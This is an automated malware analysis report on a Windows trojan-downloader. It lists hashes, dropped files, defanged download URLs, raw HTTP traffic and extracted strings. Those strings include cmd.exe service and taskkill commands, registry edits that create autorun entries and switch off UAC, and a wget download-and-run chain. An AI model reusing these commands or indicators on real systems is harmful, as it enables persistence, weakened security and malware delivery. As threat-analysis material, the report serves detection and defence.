DeepScan.Generic.Malware.GSFTk.A8279D6C_c6a056ef14

by malwarelabrobot on June 2nd, 2017 in Malware Descriptions.

DeepScan:Generic.Malware.GSFTk.A8279D6C (BitDefender), HEUR:Trojan-Downloader.Win32.Generic (Kaspersky), DeepScan:Generic.Malware.GSFTk.A8279D6C (B) (Emsisoft), Artemis!C6A056EF14AF (McAfee), ML.Attribute.HighConfidence (Symantec), DeepScan:Generic.Malware.GSFTk.A8279D6C (FSecure), Win32/DH{QjUJSA?} (AVG), DeepScan:Generic.Malware.GSFTk.A8279D6C (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: c6a056ef14afd2cddb05854f1875ba4f
SHA1: 385fe29f795ec9f427ad385ecde9294375807395
SHA256: 1c9757d9fc83eaa47304d42aa8039d8fecd64c21c40ad886e942ab7c0c56b29e
SSDeep: 3072:/W8fZBONXcX1bUpWkI5njifd2VcPcxldxOrHU:/zZsyFbUpWX5njifkVcUxjG
Size: 102400 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2017-05-15 22:05:50
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.

Payload

No specific payload has been found.

Process activity

The DeepScan creates the following process(es):

systemCheck.exe:1832
FuckTheWannaCry.exe:2124
%original file name%.exe:1976
kuxmbedujme.exe:3040
systemHome.exe:3056
systemHome.exe:2432
wget.exe:2524
wget.exe:2512
xdhgfg.exe:928

The DeepScan injects its code into the following process(es):

wget.exe:3540

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process systemCheck.exe:1832 makes changes in the file system.
The DeepScan creates and/or writes to the following file(s):

C:\Windows\sysiaop.exe (601 bytes)

The process %original file name%.exe:1976 makes changes in the file system.
The DeepScan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\FuckTheWannaCry.exe (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\systemHome.exe (155 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wget.exe (73 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\systemCheck.exe (304 bytes)

The DeepScan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\res.txt (0 bytes)

The process systemHome.exe:3056 makes changes in the file system.
The DeepScan creates and/or writes to the following file(s):

C:\Windows\WindowsUpdate\kuxmbedujme.exe (32192 bytes)

The process systemHome.exe:2432 makes changes in the file system.
The DeepScan creates and/or writes to the following file(s):

C:\Windows\WindowsUpdate\xdhgfg.exe (33404 bytes)

The process wget.exe:2524 makes changes in the file system.
The DeepScan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\res.txt (1070 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\systemCheck.exe (21099 bytes)

The process wget.exe:3540 makes changes in the file system.
The DeepScan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\res.txt (13395 bytes)

The process wget.exe:2512 makes changes in the file system.
The DeepScan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\systemHome.exe (32746 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\res.txt (1068 bytes)

Registry activity

The process systemCheck.exe:1832 makes changes in the system registry.
The DeepScan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\services\Provides a common interface and Winmgemt]
"Description" = "Windows Management Instrumantation"

The process FuckTheWannaCry.exe:2124 makes changes in the system registry.
The DeepScan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the DeepScan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"FuckTheWannaCry" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\FuckTheWannaCry.exe"

The process %original file name%.exe:1976 makes changes in the system registry.
The DeepScan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

The DeepScan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process kuxmbedujme.exe:3040 makes changes in the system registry.
The DeepScan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
"PromptOnSecureDesktop" = "0"

The process systemHome.exe:3056 makes changes in the system registry.
The DeepScan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
"PromptOnSecureDesktop" = "0"

To automatically run itself each time Windows is booted, the DeepScan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"kuxmbedujme.exe" = "C:\Windows\WindowsUpdate\kuxmbedujme.exe"

The process systemHome.exe:2432 makes changes in the system registry.
The DeepScan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
"PromptOnSecureDesktop" = "0"

To automatically run itself each time Windows is booted, the DeepScan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"xdhgfg.exe" = "C:\Windows\WindowsUpdate\xdhgfg.exe"

The process xdhgfg.exe:928 makes changes in the system registry.
The DeepScan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
"PromptOnSecureDesktop" = "0"

Dropped PE files

MD5 File path
1807f02c23b20966a66b15f38219c27e c:\Users\"%CurrentUserName%"\AppData\Local\Temp\FuckTheWannaCry.exe
294f36ce2f5bdb9762fbe02eff83dbc6 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\systemCheck.exe
641cd15c813d618175a71d657c96e87a c:\Users\"%CurrentUserName%"\AppData\Local\Temp\systemHome.exe
95ddf433184516596cf68477c2a374cb c:\Users\"%CurrentUserName%"\AppData\Local\Temp\wget.exe
0fa87626f3740e7b361ea91638fc96a5 c:\Windows\WindowsUpdate\kuxmbedujme.exe
29c49a150aeb2fb7b8554b4fdcad2303 c:\Windows\WindowsUpdate\xdhgfg.exe
294f36ce2f5bdb9762fbe02eff83dbc6 c:\Windows\sysiaop.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 12624 12800 4.08685 6a380e60f3ddefe4b0092567be9dc538
.rdata 20480 1230 1536 2.92234 2fb0d7a0133b78bed52477ea5e80a314
.data 24576 124456 87040 5.34133 512870ede7f30107d9515203b0f1cf7d

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://do8fli.a1free9bird.com/systemHome.exe
hxxp://do8fli.a1free9bird.com/systemCheck.exe
hxxp://do8fli.a1free9bird.com:80/systemCheck.exe
hxxp://do8fli.a1free9bird.com:80/systemHome.exe
ka7ds.a1free9bird.com 119.1.109.84
dns.msftncsi.com 131.107.255.255
teredo.ipv6.microsoft.com 157.56.106.189


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

GET /systemCheck.exe HTTP/1.0
User-Agent: Wget/1.5.3.1
Host: do8fli.a1free9bird.com:80
Accept: */*


HTTP/1.1 200 OK
Date: Thu, 01 Jun 2017 19:12:57 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 18 May 2017 11:02:15 GMT
ETag: "19000-54fca5670e04b"
Accept-Ranges: bytes
Content-Length: 102400
Content-type: application/octet-stream
Content-Disposition: attachment
Connection: close
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......*..un..&n..&
n..&X..&d..&...&{..&X..&>..&...&g..&n..&...&...&j..&Richn..&.......
.PE..L....T3T..........................................@..............
...............................................................d......
......................................................................
........................................text..........................
..... ..`.rdata........... ..................@..@.data....h...0...P...
0..............@....rsrc...............................@..@...........
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>


GET /systemHome.exe HTTP/1.0
User-Agent: Wget/1.5.3.1
Host: do8fli.a1free9bird.com:80
Accept: */*


HTTP/1.1 200 OK
Date: Thu, 01 Jun 2017 19:12:55 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 18 May 2017 11:02:08 GMT
ETag: "25568-54fca5600c66c"
Accept-Ranges: bytes
Content-Length: 152936
Content-type: application/octet-stream
Content-Disposition: attachment
Connection: close
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........aJm..$>.
.$>..$>.Q.>..$>.R.>..$>.R.>..$>.R.>a.$>.
.%>w.$>.x.>..$>.y.>..$>.R.>..$>.y.>..$>R
ich..$>........................PE..L....W.U.................>...
&.......n.......P....@.......................................@........
.........................,........p...............F..h.......0...PR..8
...........................H...@............P.........................
......text....=.......>.................. ..`.rdata..tq...P...r...B
..............@..@.data...`........v..................@....rsrc.......
.p.......*..............@..@.reloc..0...........................@..B..
......................................................................
......................................................................
......................................................................
......................................................................
..............................................h.MA...B..Y.....hpMA...B
..Y.....h`MA..wB..Y...SB...(..h.MA..aB..Y...............U........S....
....c|w{VW.......ko.....A.......0.g .........v.........}.......YG.....
..............r... ......&..$...6?....(...4.....,...q.1...0.....#...4.
........8.........<....'.u..@.....,...D....nZ...H...R;....L...)./..
.P...S.....T... ..[..X...j..9..\...JLX...`.........d...CM3...h...E....
.l...P<....p...Q.@...t.....8...x......!..|........E......E._.D.
<<< skipped >>>

The DeepScan connects to the servers at the folowing location(s):

%original file name%.exe_1976:

.text
`.rdata
@.data
GetProcessHeap
KERNEL32.dll
USER32.dll
MSVCRT.dll
GDI32.dll
GetWindowsDirectoryA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
ole32.dll
WINMM.dll
\wget.exe
!this is a Windows NT character-mode executable
.It!"*u
F%u!N
69.u7.AQ@
:I~.vj
@hx%x
6WX.dM
PTF.c
LOGIN/]0ks
@t%s7d
ILE.DI_CTzY
*execj
y-zH.aI2,CI
NE.FOR A
!"#'(),>`
)1.5.3.1$*
ADGOID(h.MMRLLPi
\.MBNADEG
TEDKMNSR4g.LF'[
KERNEL32.DLL
WSOCK32.dll
RegCloseKey
\FuckTheWannaCry.exe
MsgWaitForMultipleObjects
RegCreateKeyExA
cmd.exe /c sc stop mssecsvc2.0
cmd.exe /c net stop mssecsvc2.0
cmd.exe /c sc delete mssecsvc2.0
cmd.exe /c sc create mssecsvc2.0 binPath= "C:\FuckTheWannaCry.exe" start= AUTO
cmd.exe /c taskkill /f /im taskse.exe
cmd.exe /c taskkill /f /im taskdl.exe
cmd.exe /c taskkill /f /im @WanaDecryptor@.exe
cmd.exe /c taskkill /f /im mssecsvc.exe
cmd.exe /c taskkill /f /im tasksche.exe
software\microsoft\windows\CurrentVersion\Run\FuckTheWannaCry
kernel32.dll
program internal error number is %d.
:"%s"
:"%s".
hXXp://do9fli.a1free9bird.com/systemClearn.exe
hXXp://do6fli.a1free9bird.com/systemClearn.exe
hXXp://do8fli.a1free9bird.com/systemHome.exe
hXXp://do8fli.a1free9bird.com/systemCheck.exe
\systemHome.exe
\systemHome.exe -T 30 -t 60 -N
\res.txt
\wget.exe -o
cmd.exe /c
\res.txt
cmd.exe /c start
\systemCheck.exe
\systemCheck.exe -T 30 -t 60 -N
\systemClearn.exe
\systemClearn.exe -T 30 -t 60 -N
\systemClearn.ex -T 30 -t 60 -N

FuckTheWannaCry.exe_2124:

.text
`.rdata
@.data
GetProcessHeap
KERNEL32.dll
MsgWaitForMultipleObjects
USER32.dll
RegCloseKey
RegCreateKeyExA
ADVAPI32.dll
MSVCRT.dll
GDI32.dll
GetWindowsDirectoryA
SHELL32.dll
ole32.dll
cmd.exe /c sc stop mssecsvc2.0
cmd.exe /c net stop mssecsvc2.0
cmd.exe /c sc delete mssecsvc2.0
cmd.exe /c sc create mssecsvc2.0 binPath= "C:\FuckTheWannaCry.exe" start= AUTO
cmd.exe /c taskkill /f /im taskse.exe
cmd.exe /c taskkill /f /im taskdl.exe
cmd.exe /c taskkill /f /im @WanaDecryptor@.exe
cmd.exe /c taskkill /f /im mssecsvc.exe
cmd.exe /c taskkill /f /im tasksche.exe
\FuckTheWannaCry.exe
software\microsoft\windows\CurrentVersion\Run\FuckTheWannaCry
kernel32.dll
program internal error number is %d.
:"%s"
:"%s".

xdhgfg.exe_928:

.text
`.rdata
@.data
.rsrc
@.reloc
operator
GetProcessWindowStation
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GET %s HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9b5) Gecko/2008032619 Firefox/3.0b5
Host: %s
,5-%d
Range:bytes=0-%s
POST /?%d HTTP/1.1
Content-Length: %d
X-%c: %c
hXXp://
VVV.%s
Windows 8
Windows 7
Windows Vista
Windows 2003
Windows XP
Windows 2000
Windows NT
Windows 2008
%d * %dMHz
dnsapi.dll
KERNEL32.dll
Software\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
.temp.fortest
\WindowsUpdate
F:\Projects\7
\20150606\Server\Release\Server.pdb
WS2_32.dll
IPHLPAPI.DLL
DNSAPI.dll
WinExec
GetProcessHeap
GetCPInfo
USER32.dll
RegOpenKeyA
RegCloseKey
ADVAPI32.dll
ShellExecuteExA
SHELL32.dll
SHLWAPI.dll
zcÁ
MFC42.DLL
MSVCRT.dll
_acmdln
ole32.dll
OLEAUT32.dll
function confirm(str){return true;}function alert(str){return true;}window.history.back(-1);
CWebBrowser2
jg5epm.a1free9bird.com
C:\Windows\WindowsUpdate\xdhgfg.exe
C:\Windows\WindowsUpdate
xdhgfg.exe
qlsozluufu.exe
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
0 0$0(0,00040~0
;*;/;;;@;_;
2 2$2024282
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
kernel32.dll
USER32.DLL
{8856F961-340A-11D0-A96B-00C04FD705A2}
1, 0, 0, 1
BrowserServer.EXE

conhost.exe_3552:

.text
`.data
.rsrc
@.reloc
GDI32.dll
USER32.dll
msvcrt.dll
ntdll.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
KERNEL32.dll
IMM32.dll
ole32.dll
OLEAUT32.dll
PutInputInBuffer: EventsWritten != 1 (0x%x), 1 expected
Invalid message 0x%x
InitExtendedEditKeys: Unsupported version number(%d)
Console init failed with status 0x%x
CreateWindowsWindow failed with status 0x%x, gle = 0x%x
InitWindowsStuff failed with status 0x%x (gle = 0x%x)
InitSideBySide failed create an activation context. Error: %d
GetModuleFileNameW requires more than ScratchBufferSize(%d) - 1.
GetModuleFileNameW failed %d.
Invalid EventType: 0x%x
Dup handle failed for %d of %d (Status = 0x%x)
Couldn't grow input buffer, Status == 0x%x
InitializeScrollBuffer failed, Status = 0x%x
CreateWindow failed with gle = 0x%x
Opening Font file failed with error 0x%x
\ega.cpi
NtReplyWaitReceivePort failed with Status 0x%x
ConsoleOpenWaitEvent failed with Status 0x%x
NtCreatePort failed with Status 0x%x
GetCharWidth32 failed with error 0x%x
GetTextMetricsW failed with error 0x%x
GetSystemEUDCRangeW: RegOpenKeyExW(%ws) failed, error = 0x%x
RtlStringCchCopy failed with Status 0x%x
Cannot allocate 0n%d bytes
|%SWj
O.fBf;
ReCreateDbcsScreenBuffer failed. Restoring to CP=%d
Invalid Parameter: 0x%x, 0x%x, 0x%x
ConsoleKeyInfo buffer is full
Invalid screen buffer size (0x%x, 0x%x)
SetROMFontCodePage: failed to memory allocation %d bytes
FONT.NT
Failed to set font image. wc=x, sz=(%x,%x)
Failed to set font image. wc=x sz=(%x, %x).
Failed to set font image. wc=x sz=(%x,%x)
FullscreenControlSetColors failed - Status = 0x%x
FullscreenControlSetPalette failed - Status = 0x%x
WriteCharsFromInput failed 0x%x
WriteCharsFromInput failed %x
RtlStringCchCopyW failed with Status 0x%x
CreateFontCache failed with Status 0x%x
FTPh
\>.Sj
GetKeyboardLayout
MapVirtualKeyW
VkKeyScanW
GetKeyboardState
UnhookWindowsHookEx
SetWindowsHookExW
GetKeyState
ActivateKeyboardLayout
GetKeyboardLayoutNameA
GetKeyboardLayoutNameW
_amsg_exit
_acmdln
ShipAssert
NtReplyWaitReceivePort
NtCreatePort
NtEnumerateValueKey
NtQueryValueKey
NtOpenKey
NtAcceptConnectPort
NtReplyPort
SetProcessShutdownParameters
GetCPInfo
conhost.pdb
%$%a%b%V%U%c%Q%W%]%\%[%
%<%^%_%Z%T%i%f%`%P%l%g%h%d%e%Y%X%R%S%k%j%
version="5.1.0.0"
name="Microsoft.Windows.ConsoleHost"
<requestedExecutionLevel
name="Microsoft.Windows.ConsoleHost.SystemDefault"
publicKeyToken="6595b64144ccf1df"
name="Microsoft.Windows.SystemCompatible"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
< =$>:>@>
2%2X2
%SystemRoot%
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\TrueTypeFont
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\FullScreen
WindowSize
ColorTableu
ExtendedEditkeyCustom
ExtendedEditKey
Software\Microsoft\Windows\CurrentVersion
\ !:=/.<>;|&
%d/%d
cmd.exe
desktop.ini
\console.dll
%d/%d
6.1.7601.17641 (win7sp1_gdr.110623-1503)
CONHOST.EXE
Windows
Operating System
6.1.7601.17641

wget.exe_3540:

!this is a Windows NT character-mode executable
E.Ph"
E.It!
%a %b %e %H:%M:%S %Y
%m/%d/%y
%I:%M:%S %p
%H:%M:%S
Created fd %d.
Closing fd %d
Master socket fd %d bound.
Created socket fd %d.
PTF.c
!((cmd & DO_LIST) && (cmd & DO_RETR))
(cmd & (DO_LIST | DO_CWD | DO_RETR | DO_LOGIN)) != 0
user && passwd
Connecting to %s:%hu...
%s: %s
socket: %s
Connection to %s:%hu refused.
connect: %s
Logging in as %s ...
The server refuses login.
Login incorrect.
==> TYPE %c ...
Unknown type `%c', closing control connection.
==> CWD %s ...
No such directory `%s'.
%d.%d.%d.%d
Will try connecting to %s:%hu.
==> PORT ...
Bind error (%s).
Invalid PORT.
==> RETR %s ...
No such file `%s'.
No such file or directory `%s'.
accept: %s
Length: %s
[%s to go]
%s: %s, closing control connection.
%s (%s) - Data connection: %s;
%s (%s) -
File `%s' already there, not retrieving.
(try:-)
--%s-- %s
%s => `%s'
%s (%s) - `%s' saved [%ld]
%s URL: %s [%ld] -> "%s" [%d]
.listing
Using `%s' as listing tmp file.
unlink: %s
Removed `%s'.
Recursion depth %d exceeded max. depth %d.
Local file `%s' is more recent, not retrieving.
Symlinks not supported, skipping symlink `%s'.
Skipping directory `%s'.
%s: unknown/unsupported file type.
%s: corrupt time-stamp.
Unrecognized permissions for %s.
Will not retrieve dirs since depth is %d (max %d).
/%s%s%s
Not descending to `%s' as it is excluded/not-included.
Rejecting `%s'.
No matches on pattern `%s'.
Wrote HTML-ized index to `%s' [%ld].
Wrote HTML-ized index to `%s'.
331 s/key
331 opiekey
%s%s%s
--> %s
--> PASS Turtle Power!
%d,%d,%d,%d,%d,%d
PORT
month: %s;
day: %d;
year: %d (no tm);
time: d:d:d (no yr);
link to: %s
trailing `*' on exec.
store is `%s'
%s: option `%s' is ambiguous
%s: option `--%s' doesn't allow an argument
%s: option `%c%s' doesn't allow an argument
%s: option `%s' requires an argument
%s: unrecognized option `--%s'
%s: unrecognized option `%c%s'
%s: illegal option -- %c
%s: option requires an argument -- %c
Checking for %s.
%s was already used, by that name.
This is the first time I hear about host %s by that name.
We've dealt with host %s, but under the name %s.
Comparing hosts %s and %s...
They are alike, after realhost()->%s.
They are not the same (%s, %s).
%s: Cannot determine user-id.
%s: Warning: gethostname failed
%s: Warning: cannot determine local IP address.
%s: Warning: cannot reverse-lookup local IP address.
%s@%s
%s%s%s@
Index of /%s on %s:%d
%d %s d
d:d
<a href="PTF://%s%s:%hu
(%s bytes)
-> %s
HTTP/
http.c
%s: %s.
Referer: %s
Wget/%s
%s %s HTTP/1.0
User-Agent: %s
Host: %s:%d
Accept: %s
%s%s%s%s%s%s
%s---request end---
Failed writing HTTP request.
%s request sent, awaiting response...
Read error (%s) in headers.
%d %s
Location: %s%s
(%s to go)
Warning: wildcards not supported in HTTP.
File `%s' already there, will not retrieve.
Cannot write to `%s' (%s).
ERROR: Redirection (%d) without location.
%s ERROR %d: %s.
%s (%s) - `%s' saved [%ld/%ld]
%s URL:%s [%ld/%ld] -> "%s" [%d]
%s URL:%s [%ld] -> "%s" [%d]
%s (%s) - Connection closed at byte %ld.
%s (%s) - `%s' saved [%ld/%ld])
%s (%s) - Connection closed at byte %ld/%ld.
%s (%s) - Read error at byte %ld (%s).
%s (%s) - Read error at byte %ld/%ld (%s).
%a, %d %b %Y %T
%a, %d-%b-%y %T
%a %b %d %T %Y
%s:%s
%s: Basic %s
Authorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
followftp
ftpproxy
httppasswd
httpproxy
httpuser
login
passiveftp
passwd
proxypasswd
%s: %s: %s.
wget.ini
%swget.ini
%s: Cannot read %s (%s).
%s: Error in %s at line %d.
%s: BUG: unknown command `%s', value `%s'.
%s: %s: Please specify on or off.
%s: %s: Invalid specification `%s'.
%s: Invalid specification `%s'
%s: %s: %s
follow-ftp
passive-ftp
http-passwd
http-user
proxy-passwd
Usage: %s [OPTION]... [URL]...
GNU Wget %s, a non-interactive network retriever.
Mail bug reports and suggestions to <bug-wget@gnu.org>.
--follow-ftp follow FTP links from HTML documents.
-r, --recursive recursive web-suck -- use with care!.
-nr, --dont-remove-listing don't remove `.listing' files.
FTP options:
--retr-symlinks retrieve FTP symbolic links.
--passive-ftp use the "passive" transfer mode.
HTTP options:
--http-user=USER set http user to USER.
--http-passwd=PASS set http password to PASS.
--proxy-passwd=PASS set PASS as proxy password.
-s, --save-headers save the HTTP headers to file.
-i, --input-file=FILE read URL-s from file.
-e, --execute=COMMAND execute a `.wgetrc' command.
%s%s%s%s%s%s%s%s%s%s
GNU Wget %s
Written by Hrvoje Niksic <hniksic@srce.hr>.
%s: %s: invalid command
%s: illegal option -- `-n%c'
Try `%s --help' for more options.
%s: missing URL
Windows
DEBUG output created by Wget %s on %s.
No URLs found in %s.
FINISHED --%s--
Downloaded: %s bytes in %d files
Download quota (%s bytes) EXCEEDED!
.netrc
%s/%s
password
%s: %s:%d: warning: "%s" token appears before any machine name
%s: %s:%d: unknown token "%s"
this_url != NULL
Double yuck! The *base* URL is broken.
Yuck! A bad URL.
u->url != NULL
Uh, it is FTP but i'm not in the mood to follow FTP.
%s (%s) is excluded/not-included.
%s (%s) does not match acc/rej rules.
robots.txt
Stuffing %s because %s forbids it.
%s is not text/html so we don't chase.
Removing %s.
Removing %s since it should be rejected.
%s already in list, so we don't load.
Rescanning %s
It should correspond to %s.
I cannot find the corresponding URL.
%s flagged for conversion, local %s
err == URLOK && u->proto == URLHTTP
Loading robots.txt; please ignore errors.
Line: %s
Matching %s against:
[=%%]
[ skipping %dK ]
P?%s: %s.
Proxy %s: %s.
Proxy %s: Must be HTTP.
u->proto != URLFILE
%s: Redirection to itself.
http:
https:
rlogin:
shttp:
hXXp://
PTF://
:*<>"%{}|\^[]`
url.c
parseurl ("%s") ->
host %s ->
port %hu ->
opath %s ->
dir %s -> file %s ->
ndir %s
!"#'(),>`{}|<>
Loaded %s (size %ld).
Loaded HTML file %s (size %ld).
Error (%s): Link %s without a base provided.
Error (%s): Base %s relative, without referer URL.
file %s; this_url %s; base %s
link: %s; constr: %s
%s.%d
Removing %s because of directory danger!
index.html
http_proxy
ftp_proxy
Converting %s...
Cannot convert links in %s: %s
Skipping %s at position %d (flags %d).
ABS2REL: %s to %s at position %d in %s.
%s: %s: Not enough memory.
d:d:d
Unknown/unsupported protocol
Invalid port specification
utime: %s
Unlinking %s (symlink).
Failed to unlink symlink `%s': %s
1.5.3.1
CTRL Break received, redirecting output to `%s'.
Output will be written to `%s'.
Wget %s%s
%s%s.HLP
Starting WinHelp %s
%s: Couldn't find usable socket driver.
Assertion failed: %hs, file %hs, line %d
!BREAKRETURN =
%hs, file %hs, line %d
Broken pipe
USER32.DLL
The instruction at 0x00000000 caused a denormal operand floating point
The instruction at 0x00000000 caused an invalid operation floating point
A privileged instruction was executed at address 0x00000000.
An illegal instruction was executed at address 0x00000000.
Floating-point support not loaded
ABEDABELABETABLEABUTACHEACIDACMEACREACTAACTSADAMADDSADENAFARAFROAGEEAHEMAHOYAIDAAIDEAIDSAIRYAJARAKINALANALECALGAALIAALLYALMAALOEALSOALTOALUMALVAAMENAMESAMIDAMMOAMOKAMOSAMRAANDYANEWANNAANNEANTEANTIAQUAARABARCHAREAARGOARIDARMYARTSARTYASIAASKSATOMAUNTAURAAUTOAVERAVIDAVISAVONAVOWAWAYAWRYBABEBABYBACHBACKBADEBAILBAITBAKEBALDBALEBALIBALKBALLBALMBANDBANEBANGBANKBARBBARDBAREBARKBARNBARRBASEBASHBASKBASSBATEBATHBAWDBAWLBEADBEAKBEAMBEANBEARBEATBEAUBECKBEEFBEENBEERBEETBELABELLBELTBENDBENTBERGBERNBERTBESSBESTBETABETHBHOYBIASBIDEBIENBILEBILKBILLBINDBINGBIRDBITEBITSBLABBLATBLEDBLEWBLOBBLOCBLOTBLOWBLUEBLUMBLURBOARBOATBOCABOCKBODEBODYBOGYBOHRBOILBOLDBOLOBOLTBOMBBONABONDBONEBONGBONNBONYBOOKBOOMBOONBOOTBOREBORGBORNBOSEBOSSBOTHBOUTBOWLBOYDBRADBRAEBRAGBRANBRAYBREDBREWBRIGBRIMBROWBUCKBUDDBUFFBULBBULKBULLBUNKBUNTBUOYBURGBURLBURNBURRBURTBURYBUSHBUSSBUSTBUSYBYTECADYCAFECAGECAINCAKECALFCALLCALMCAMECANECANTCARDCARECARLCARRCARTCASECASHCASKCASTCAVECEILCELLCENTCERNCHADCHARCHATCHAWCHEFCHENCHEWCHICCHINCHOUCHOWCHUBCHUGCHUMCITECITYCLADCLAMCLANCLAWCLAYCLODCLOGCLOTCLUBCLUECOALCOATCOCACOCKCOCOCODACODECODYCOEDCOILCOINCOKECOLACOLDCOLTCOMACOMBCOMECOOKCOOLCOONCOOTCORDCORECORKCORNCOSTCOVECOWLCRABCRAGCRAMCRAYCREWCRIBCROWCRUDCUBACUBECUFFCULLCULTCUNYCURBCURDCURECURLCURTCUTSDADEDALEDAMEDANADANEDANGDANKDAREDARKDARNDARTDASHDATADATEDAVEDAVYDAWNDAYSDEADDEAFDEALDEANDEARDEBTDECKDEEDDEEMDEERDEFTDEFYDELLDENTDENYDESKDIALDICEDIEDDIETDIMEDINEDINGDINTDIREDIRTDISCDISHDISKDIVEDOCKDOESDOLEDOLLDOLTDOMEDONEDOOMDOORDORADOSEDOTEDOUGDOURDOVEDOWNDRABDRAGDRAMDRAWDREWDRUBDRUGDRUMDUALDUCKDUCTDUELDUETDUKEDULLDUMBDUNEDUNKDUSKDUSTDUTYEACHEARLEARNEASEEASTEASYEBENECHOEDDYEDENEDGEEDGYEDITEDNAEGANELANELBAELLAELSEEMILEMITEMMAENDSERICEROSEVENEVEREVILEYEDFACEFACTFADEFAILFAINFAIRFAKEFALLFAMEFANGFARMFASTFATEFAWNFEARFEATFEEDFEELFEETFELLFELTFENDFERNFESTFEUDFIEFFIGSFILEFILLFILMFINDFINEFINKFIREFIRMFISHFISKFISTFITSFIVEFLAGFLAKFLAMFLATFLAWFLEAFLEDFLEWFLITFLOCFLOGFLOWFLUBFLUEFOALFOAMFOGYFOILFOLDFOLKFONDFONTFOODFOOLFOOTFORDFOREFORKFORMFORTFOSSFOULFOURFOWLFR